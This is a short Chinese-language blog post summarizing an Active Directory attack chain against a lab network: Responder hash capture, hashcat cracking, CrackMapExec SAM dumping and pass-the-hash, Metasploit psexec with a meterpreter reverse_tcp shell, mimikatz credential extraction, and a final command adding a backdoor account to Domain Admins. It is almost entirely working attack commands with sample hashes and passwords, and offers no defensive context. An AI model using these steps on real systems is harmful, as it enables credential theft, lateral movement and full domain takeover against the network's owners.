Responder探测内网获取域控权限总结
(1)执行Responder探测内网(https://github.com/lgandx/Responder)
./Responder.py -I eth0 -rPv
(2)获取172.16.157.133的Responder值
(3)使用Crack Map Exec检查此主机的NetBIOS信息
cme smb 172.16.157.133
(4)使用hashcat对Responder值进行破解
hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule
获取密码值Winter2018!
(5)CME扫描
cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' –local-auth
(6)获取本地的管理员帐户对本地密码散列进行dump
cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' –local-auth –sam
(7)获取FRONTDESK密码的NTLM哈希值
FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::
(8)哈希传递方式查看本地网络的smb权限情况
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' –local-
auth
(9)可以登录172.16.157.134服务器
(10)对172.16.157.134进行查看,该计算机具备域控权限
cme smb 172.16.157.134
(11)msf下面利用smb口令进行shell获取
use exploit/windows/smb/psexec
set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51
set smbuser administrator
set playload windows/x64/meterpreter/reverse_tcp
run
getuid
(12)使用mimikatz获取域控密码
load mimikatz
kerberos
cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda
原创文章,作者:745907710,如若转载,请注明出处:https://blog.ytso.com/237606.html